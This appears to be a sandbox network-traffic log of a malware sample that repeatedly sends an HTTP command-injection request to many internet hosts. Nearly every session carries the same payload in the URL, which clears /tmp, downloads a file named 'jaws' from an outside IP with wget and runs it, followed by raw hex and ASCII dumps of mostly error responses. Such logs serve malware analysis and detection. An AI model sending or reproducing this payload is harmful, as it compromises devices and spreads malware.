                                                          Jan 2, 2024 06:24:50.251379967 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          355192.168.2.2356708121.11.37.23480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:50.567236900 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:51.527112007 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          356192.168.2.2354816174.71.165.22980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:51.730581045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:51.892411947 CET499INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:51 GMT
                                                          X-Frame-Options: SAMEORIGIN
                                                          Content-Security-Policy: frame-ancestors 'self'
                                                          X-XSS-Protection: 1; mode=block
                                                          Content-Length: 226
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          357192.168.2.2346794152.200.138.8180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:51.767453909 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          358192.168.2.23398762.21.48.24880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:51.823066950 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:52.071661949 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:51 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:51 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 63 39 62 31 37 30 32 26 23 34 36 3b 31 37 30 34 31 37 33 30 39 31 26 23 34 36 3b 32 63 64 64 36 35 66 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ac9b1702&#46;1704173091&#46;2cdd65f5</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          359192.168.2.234726652.85.133.3180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:51.888603926 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:52.046765089 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:24:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          360192.168.2.236094851.210.249.6680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:52.075604916 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:52.328078032 CET506INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:52 GMT
                                                          Server: Apache/2.4.56 (Debian)
                                                          Content-Length: 312
                                                          Connection: close
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 69 6a 6f 75 78 79 6f 75 70 6c 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at www.bijouxyoupla.com Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          361192.168.2.2352484104.93.2.11980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:52.173460960 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:52.460793972 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:52 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:52 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 34 64 37 64 32 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 39 32 26 23 34 36 3b 37 61 36 65 62 38 31 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;94d7d217&#46;1704173092&#46;7a6eb813</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          362192.168.2.234318442.237.113.22280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:52.311736107 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:52.660515070 CET355INHTTP/1.1 403 Forbidden
                                                          Server: Byte-nginx
                                                          Date: Tue, 02 Jan 2024 05:24:52 GMT
                                                          Content-Type: application/octet-stream
                                                          Connection: keep-alive
                                                          Byte-Error-Code: 0060
                                                          Content-Length: 24
                                                          via: cache05.hnpycu01
                                                          x-request-ip: 212.102.41.2
                                                          x-tt-trace-tag: id=5
                                                          x-response-cinfo: 212.102.41.2
                                                          x-response-cache: miss
                                                          Data Raw: 31 32 37 2e 30 2e 30 2e 31 20 63 6f 6e 66 20 6e 6f 74 20 66 6f 75 6e 64
                                                          Data Ascii: 127.0.0.1 conf not found


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          363192.168.2.2349944107.149.236.15180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:54.829092979 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:54.992598057 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:05 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          364192.168.2.236078218.169.231.14580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:54.905174971 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          365192.168.2.235318446.4.186.23680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:54.906256914 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.146893024 CET315INHTTP/1.1 400 Bad Request
                                                          Server: openresty
                                                          Date: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 154
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          366192.168.2.234214451.68.46.2380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:54.912246943 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.158963919 CET321INHTTP/1.1 400 Bad Request
                                                          Server: nginx/1.23.1
                                                          Date: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 157
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          367192.168.2.234205090.186.147.7480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:54.920917034 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.180138111 CET516INHTTP/1.0 400 Bad Request
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Content-Length: 349
                                                          Date: Tue, 02 Jan 2024 05:24:54 GMT
                                                          Server: lighttpd/1.4.18
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          368192.168.2.2358622104.99.215.10880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:54.969764948 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.274247885 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 36 35 35 38 36 63 62 26 23 34 36 3b 31 37 30 34 31 37 33 30 39 35 26 23 34 36 3b 63 32 35 63 61 36 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;765586cb&#46;1704173095&#46;c25ca6d</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          369192.168.2.2348840108.186.112.3480
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:54.992165089 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.155148983 CET306INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 146
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          370192.168.2.2339044146.71.50.19523
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.195460081 CET179INHTTP/1.0 200 OK
                                                          Server: Proxy
                                                          Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 32 31 32 2e 31 30 32 2e 34 31 2e 32 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 31 2d 30 32 20 31 33 3a 32 34 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a
                                                          Data Ascii: Unauthorized ...IP Address: 212.102.41.2MAC Address: Server Time: 2024-01-02 13:24:54Auth Result: .


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          371192.168.2.234859823.205.246.4880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:55.255105972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.540848017 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:55 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 66 39 35 63 30 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 39 35 26 23 34 36 3b 34 33 31 34 64 62 30 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;1f95c017&#46;1704173095&#46;4314db0a</BODY></HTML>


